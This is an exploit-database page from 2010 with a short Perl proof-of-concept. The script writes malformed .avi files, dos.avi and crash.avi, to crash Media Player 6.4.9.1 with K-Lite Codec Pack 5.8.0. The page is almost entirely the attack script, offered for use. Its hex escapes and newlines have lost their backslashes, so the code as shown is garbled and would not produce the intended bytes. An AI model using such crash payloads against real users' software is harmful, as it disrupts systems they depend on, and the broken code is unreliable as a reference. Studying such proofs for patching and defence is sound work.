[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Media Player V6.4.9.1 with K-Lite Codec Pack DoS/Crash (.avi file)
# Published : 2010-03-14
# Author : En|gma7
# Previous Title : GOM Player v2.1.21 avi File DoS
# Next Title : Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Exploit Title: Media Player V6.4.9.1 with K-Lite Codec Pack DoS/Crash (.avi file)
# Date: 14/3/2010
# Author: En|gma7
# Software Link: http://www.free-codecs.com/K_lite_codec_pack_download.htm
# Version: Media Player V6.4.9.1 with K-Lite Codec Pack 5.8.0
# Tested on: WinXP/Vista
# CVE : [if exists]
# Code :
#!/usr/bin/perl
# dos.avi work on windows XP with all SP
#crash.avi work on WinXP/Vista
print "
[~] Media Player V6.4.9.1 with K-Lite Codec Pack 5.8.0 DoS/Crash (.avi file)
[~] EN|GMA7 Team ~
[~] By Zaid
[~] www.enigma7.net<http://www.enigma7.net><http://www.enigma7.net>
";
$bf = "x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00";
$crash = "x4Dx54x68x64x00x00x00x06";
open(file, "> dos.avi");
print (file $bf);
open(file, "> crash.avi");
print (file $crash);
print "nn[+] Done!n
[+] dos.avi and crash.avi created..n
[+] Z-at-Enigma7.netn";